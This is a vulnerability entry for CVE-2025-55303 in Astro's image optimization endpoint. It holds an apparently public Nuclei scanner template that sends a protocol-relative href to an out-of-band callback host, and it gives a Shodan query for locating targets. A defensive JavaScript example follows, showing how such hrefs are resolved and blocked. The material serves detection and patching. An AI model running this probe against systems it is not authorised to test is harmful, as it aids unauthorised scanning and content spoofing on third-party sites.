Astro < 5.13.2 and < 4.16.18 contains an information disclosure vulnerability caused by improper validation of protocol-relative URLs in the image optimization endpoint, which lets attackers serve images from unauthorized third-party domains; exploitation requires an on-demand rendering deployment.
PoC code [public]
id: CVE-2025-55303

info:
  name: Astro - Unauthorized Third-Party Image Access
  author: theamanrawat
  severity: medium
  description: |
    Astro < 5.13.2 and < 4.16.18 contains an information disclosure vulnerability caused by improper validation of protocol-relative URLs in the image optimization endpoint, letting attackers serve images from unauthorized third-party domains, exploit requires on-demand rendering deployment.
  impact: |
    Attackers can serve images from unauthorized third-party domains, potentially leading to information disclosure or content spoofing.
  remediation: |
    Update to versions 5.13.2 or 4.16.18 or later.
  reference:
    - https://github.com/advisories/GHSA-xf8x-j4p2-f749
    - https://nvd.nist.gov/vuln/detail/CVE-2025-55303
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N
    cvss-score: 6.4
    cve-id: CVE-2025-55303
    epss-score: 0.00009
    epss-percentile: 0.00668
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"astro"
  tags: cve,cve2025,astro,ssrf,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/_image?href=//{{interactsh-url}}/600x400"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'interactsh_protocol == "http"'
          - 'contains(header, "image/")'
        condition: and
# digest: 4a0a004730450221008a847b57d26b0fd53ac33637ba7344a6f9b4cd89ae15040ebbc314a3c5d5ccff0220350429922122995b716db418c2d51f2af70ad18f184b67799be76da9bda8950f:922c64590222798bb761d5b6d8e72950
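The root cause the template probes is an `href` check that treats a protocol-relative value such as `//host/path` as a local path. The following is an added illustration, not Astro's own code or its fix: a naive prefix check beside a hardened classifier that resolves `href` against the site origin, so any value that lands on a different origin is treated as remote and subject to an allow-list. The hostnames, the `ALLOWED_REMOTE_HOSTS` set and `siteOrigin` are constructed assumptions.

```javascript
// Added example (not from the Astro project). Hostnames below are constructed placeholders.
const ALLOWED_REMOTE_HOSTS = new Set(['images.example.com']); // assumed remote-image allow-list

// Naive check: only "http://" or "https://" counts as remote, so a protocol-relative
// value like "//evil.example/600x400" is mistaken for a same-site path. This is the
// class of defect described for CVE-2025-55303, not a copy of Astro's actual logic.
function isRemoteNaive(href) {
  return /^https?:\/\//i.test(href);
}

// Hardened check: let the WHATWG URL parser resolve the value against the site
// origin. "//host/...", "http(s)://host/..." and backslash variants all resolve to a
// different origin and are classified as remote; only same-origin paths stay local.
function classifyHref(href, siteOrigin = 'https://site.example') {
  let url;
  try {
    url = new URL(href, siteOrigin);
  } catch {
    return { kind: 'invalid' };
  }
  // Reject non-HTTP schemes (data:, javascript:, file:, ...) outright.
  if (url.protocol !== 'http:' && url.protocol !== 'https:') {
    return { kind: 'invalid' };
  }
  if (url.origin === new URL(siteOrigin).origin) {
    return { kind: 'local', path: url.pathname };
  }
  if (ALLOWED_REMOTE_HOSTS.has(url.hostname)) {
    return { kind: 'remote-allowed', host: url.hostname };
  }
  // Anything else is a third-party fetch the endpoint must refuse.
  return { kind: 'remote-blocked', host: url.hostname };
}
```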